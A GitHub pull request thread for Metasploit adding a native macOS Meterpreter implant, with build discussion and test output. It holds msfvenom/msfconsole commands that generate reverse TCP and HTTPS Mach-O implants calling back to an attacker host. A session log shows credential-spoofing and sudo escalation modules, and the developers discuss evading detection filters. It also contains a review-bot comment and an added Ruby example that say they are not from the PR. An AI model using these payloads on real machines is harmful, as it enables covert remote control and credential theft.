OSX meterpreter #8439

Merged
merged 4 commits into from
Jul 21, 2017
Conversation

timwr
Contributor

@timwr timwr commented May 23, 2017

I thought I'd PR this up early even though it's not quite ready to land, feel free to close this. It was straightforward to build mettle on OSX on OSX itself (i.e., without cross-compiling). Full credit to @acammack-r7 and @busterb
We'll need to update the gem to include the x86_64-apple-darwin TARGET.
Until then if you cd to the mettle directory it will be picked up automatically.

  1. Land update README.md for building on OSX mettle#80
  2. make TARGET=x86_64-apple-darwin
  3. Start a handler: msfconsole -qx "use exploit/multi/handler; set payload osx/x64/meterpreter_reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j"
  4. Generate a macho: msfvenom -p osx/x64/meterpreter_reverse_tcp LHOST=$LHOST LPORT=4444 -f macho -o out
  5. Run it :)

@timwr timwr added blocked Blocked by one or more additional tasks enhancement feature meterpreter msfvenom labels May 23, 2017
@cbrnrd
Contributor

cbrnrd commented May 24, 2017

Testing (El Capitan 10.11.8 i386)

meterpreter > shell
Process 37363 created.
Channel 1 created.
/bin/sh: line 0: fg: no job control

[-] core_channel_write: Operation failed: 9
meterpreter > load -l
espia.x64
espia.x86
extapi.x64
extapi.x86
incognito.x64
incognito.x86
kiwi.x64
kiwi.x86
lanattacks.x64
lanattacks.x86
mimikatz.x64
mimikatz.x86
powershell.x64
powershell.x86
priv.x64
priv.x86
python.x64
python.x86
sniffer.x64
sniffer.x86
stdapi
stdapi.x64
stdapi.x86
winpmem.x86
meterpreter > load powershell.x86
Loading extension powershell.x86...
[-] Failed to load extension: No module of the name ext_server_powershell.x86. found
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use osx/gather/password_prompt_spoof
msf post(password_prompt_spoof) > set SESSION 1
SESSION => 1
msf post(password_prompt_spoof) > run

[*] Running module against Carters-MacBook-Air-2.local

^C[-] Post interrupted by the console user     <---- didn't work
[*] Post module execution completed
msf post(password_prompt_spoof) > use multi/manage/sudo
msf post(sudo) > options

Module options (post/multi/manage/sudo):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password to use when running sudo.
   SESSION                    yes       The session to run this module on.

msf post(sudo) > set PASSWORD <sudopass>
PASSWORD => <sudopass>
msf post(sudo) > set SESSION 1
SESSION => 1
msf post(sudo) > run

[*] SUDO: Attempting to upgrade to UID 0 via sudo
[*] Sudoing with password `<sudopass>'.
[-] SUDO: Didn't work out, still a mere user.
[*] Post module execution completed
msf post(sudo) > 

I doubt that the windows extensions are meant to be loaded. Also, a lot of post modules seem to be hanging (at least for a long time).

@sempervictus
Contributor

@timwr: how does one build the mettle payload for x86_64-apple-darwin without xcode? Without the binary in the payload gem, framework won't load with a failure in the generate call. :(

@timwr
Contributor Author

timwr commented May 26, 2017

@sempervictus please see rapid7/mettle#80. You can only build on OSX (with xcode) unfortunately.
@cbrnrd I only tested with x86_64, let me see if I can reproduce

@sempervictus
Contributor

@timwr: shouldn't that be a blocking change? Some of us run Linux :). Any way around xcode via the cross compiler chain? Are there any legal constraints imposed by xcode on the product for us to be worried about? If everyone can't all build their own, this will get caught very quickly - the static binary provided by r7 will be signed for, and as soon as network, disk, or other filters see it, we'll be in trouble.

@timwr
Contributor Author

timwr commented May 26, 2017

I run Linux too, I'm able to run OSX within VirtualBox on an Ubuntu host.
However: I've been struggling to find a way to cross compile for OSX from Linux.
With an OSX build machine you can cross compile for Linux, for Windows and for OSX itself, so I think it's the only option, but I'd love to be proven wrong.

@sempervictus
Contributor

sempervictus commented May 26, 2017

Hmm, must be some technical method around this, especially since both virtualizing Apple OS and using their toolchain carry potential legal ramifications. Pulled out an older imac, hoping to have a build up in a bit :)

IIRC @AnwarMohamed had OSX binaries building with the old Bionic sources. Might merit a look...

@timwr
Contributor Author

timwr commented May 26, 2017

I'm pretty sure this: https://github.com/AnwarMohamed/meterpreter-darwin/ is meant to be built with OSX, not Linux.
I've updated rapid7/mettle#80 to fix make TARGET=i386-apple-darwin

@timwr
Contributor Author

timwr commented May 26, 2017

@cbrnrd thanks for your testing! I've fixed the shell command now and added support for i386.
I'm not sure password_prompt_spoof is working (even with python meterpreter). I foolishly re-implemented it here: master...timwr:osx_password_prompt before I knew it existed :(

@timwr
Contributor Author

timwr commented May 26, 2017

meterpreter> shell is fixed now, but there are still issues with cmd_exec

@cbrnrd
Contributor

cbrnrd commented May 26, 2017

@timwr @sempervictus this may work for a cross compiler, I haven't tested it but it looks promising

@busterb
Contributor

busterb commented May 26, 2017

We have a real licensed Mac that we're doing internal builds for this with. It'll soon be incorporated into the ruby gem.

@busterb busterb self-assigned this May 26, 2017
@@ -2258,6 +2262,10 @@ def self.elf?(code)
code[0..3] == "\x7FELF"
end

def self.macho?(code)
code[0..3] == "\xCF\xFA\xED\xFE"
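Review bot: `macho?` only recognises the little-endian 64-bit magic `\xCF\xFA\xED\xFE`, so a 32-bit Mach-O (`\xCE\xFA\xED\xFE`), the big-endian forms of either magic, and a fat binary (`\xCA\xFE\xBA\xBE`) all return false and are not treated as Mach-O by the caller; test membership in a list of all the Mach-O magics instead, e.g. `["\xCF\xFA\xED\xFE", "\xCE\xFA\xED\xFE", "\xCA\xFE\xBA\xBE", ...].include?(code[0..3])`. Also note that, unlike the `"\x7FELF"` check just above, this literal contains non-ASCII bytes: if `code` arrives as a UTF-8 string rather than ASCII-8BIT, Ruby's `==` reports incompatible encodings as not equal, so compare `code.b[0..3]` (or `code.byteslice(0, 4).b`) against binary literals.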
Contributor

@acammack-r7 acammack-r7 May 26, 2017

To prevent weird bugs in the future, this also needs to check for the 32-bit magic (\xCE\xFA\xED\xFE), the big-endian versions of the 32-bit and 64-bit magics, and the fat-binary magic (\xCA\xFE\xBA\xBE).

Contributor Author

great spot! thanks @acammack-r7
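An added example, not code from this PR or from Metasploit: a Ruby classifier that recognises all five Mach-O magics named in the review above (32- and 64-bit, both byte orders, and the fat magic) and, for a fat binary, reads the architecture table from the header. The 20-slice cap on `nfat_arch` used to reject Java class files, the `sample_fat_binary` helper and its cputype constants are my own assumptions.

```ruby
# Added example: classify a byte string by its Mach-O magic. Not Metasploit code.
# Mach-O headers are stored in the target CPU's byte order, so each magic can
# appear in two orders on disk; the fat (universal) header is always big-endian.
MACHO_MAGICS = {
  "\xFE\xED\xFA\xCE".b => :macho32_be, # MH_MAGIC    (0xFEEDFACE), big-endian CPU
  "\xCE\xFA\xED\xFE".b => :macho32_le, # MH_MAGIC    as written by an x86 target
  "\xFE\xED\xFA\xCF".b => :macho64_be, # MH_MAGIC_64 (0xFEEDFACF), big-endian CPU
  "\xCF\xFA\xED\xFE".b => :macho64_le, # MH_MAGIC_64 as written by an x86_64 target
  "\xCA\xFE\xBA\xBE".b => :fat,        # FAT_MAGIC   (0xCAFEBABE), always big-endian
}.freeze

# Returns one of the symbols above, or nil when the prefix is not a Mach-O magic.
# Looking up a binary copy sidesteps Ruby's rule that strings with incompatible
# encodings never compare equal (a UTF-8 payload string vs. a binary literal).
def macho_kind(code)
  return nil if code.nil? || code.bytesize < 4
  MACHO_MAGICS[code.byteslice(0, 4).b]
end

def macho?(code)
  !macho_kind(code).nil?
end

# For a fat binary, list the embedded slices. Header layout, all big-endian:
#   uint32 magic, uint32 nfat_arch, then nfat_arch x {cputype, cpusubtype, offset, size, align}
# Java .class files share the 0xCAFEBABE magic; their bytes 4..7 hold the class-file
# version (>= 45), so a small cap on nfat_arch (20 here, an assumption) rejects them.
def fat_archs(code)
  return [] unless macho_kind(code) == :fat
  nfat = code.byteslice(4, 4).unpack1("N")
  return [] if nfat.nil? || nfat == 0 || nfat > 20
  (0...nfat).each_with_object([]) do |i, archs|
    entry = code.byteslice(8 + i * 20, 20)
    break archs unless entry && entry.bytesize == 20 # truncated table: keep what parsed
    cputype, _subtype, offset, size, _align = entry.unpack("N5")
    archs << { cputype: cputype, offset: offset, size: size }
  end
end

# Constructed sample (assumed values): a fat header describing an x86_64 and an i386 slice.
CPU_TYPE_X86    = 7
CPU_TYPE_X86_64 = 0x01000007
def sample_fat_binary
  "\xCA\xFE\xBA\xBE".b + [2].pack("N") +
    [CPU_TYPE_X86_64, 3, 4096, 1000, 12].pack("N5") +
    [CPU_TYPE_X86,    3, 8192,  500, 12].pack("N5")
end
```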

@sempervictus
Contributor

@cbrnrd : thank you, that does look quite promising.
@bcook-r7: what's the integration and maintenance PITA factor with that cross osx chain? It seems highly preferable not to require people to have a closed source compiler to build payloads of all things - the stuff we leave behind (if we're not careful). From a paranoia point of view, for all we know it'll embed clearly identifiable build information somewhere in the binary. Their licensing agreements are known to be rather predatory, and we're explicitly working to build stuff which circumvents their security model, which as I understand it, would violate their TOS (at least for iOS, not sure about xcode in general). The whole point of being platform independent is platform independence, right? :)

Are there any sample builds available right now? Getting this to work on OSX 10.9.5 is... problematic. In the very least we'd have to have good docs for a number of OS revisions since even some of the framework libraries are different (QuartzCore is needed in older versions in Makefile.common instead of CoreImage, the older compilers fail to build the deps, gcc doesn't install to the right places with brew, it's just a bloody mess).

@busterb
Contributor

busterb commented Jun 16, 2017

We're not using a closed-source compiler (it's clang), but I did get mettle to work fine on 10.8 through 10.12. Almost done with the build infrastructure to support it (mettle needs one more PR for this)

@OJ
Contributor

OJ commented Jun 16, 2017

When this lands I absolutely intend on following up on Metlstorm's request to build a module that will allow you to mess with the latest Macbook's Touch Bar.

@busterb busterb removed the blocked Blocked by one or more additional tasks label Jul 21, 2017
@busterb
Contributor

busterb commented Jul 21, 2017

I wasn't able to get 32-bit builds running, but did modify this PR to use the new mettle template generator, and so http/s also works:

$ ./msfvenom -p osx/x64/meterpreter_reverse_https -f macho -o test.macho lhost=127.0.0.1
No platform was selected, choosing Msf::Module::Platform::OSX from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 618316 bytes
Final size of macho file: 618316 bytes
Saved as: test.macho

@cbrnrd
Contributor

cbrnrd commented Jul 21, 2017

@busterb with your changes, is it still showing the windows plugins with load -l?

@busterb busterb merged commit 32a83e0 into rapid7:master Jul 21, 2017
busterb pushed a commit that referenced this pull request Jul 21, 2017
@busterb
Contributor

busterb commented Jul 21, 2017

Post modules hanging is fixed in another PR I'm about to submit. I honestly didn't notice the extension issue, but will address that too.

@cbrnrd
Contributor

cbrnrd commented Jul 21, 2017

Alright, let me know if I can help :)

@busterb
Contributor

busterb commented Jul 21, 2017

Added cc31689 which fixed the template generator. Also removed i386 support for now, because our builder VM still has trouble with it AFAIK (ping @jmartin-r7 )

@busterb
Contributor

busterb commented Jul 21, 2017

Release Notes

Initial support for native-code Meterpreter on macOS/OSX targets has been added. The screenshot, clipboard, and webcam_snap functionalities work from OS X 10.8 through 10.12 on x86_64 targets. The Mettle payloads gem also includes iOS and Windows binaries.

@timwr
Contributor Author

timwr commented Jul 21, 2017

@cbrnrd the load -l list is not working but you can still do load extapi to see the clipboard commands. I wonder if it's worth enabling this automatically (we do this for Android for the android commands).

@jaketblank
Contributor

jaketblank commented Nov 10, 2017

Got some cool additions here if any of you guys are interested: #9196 - made some changes to the webcam_stream player and added a new screenshare command
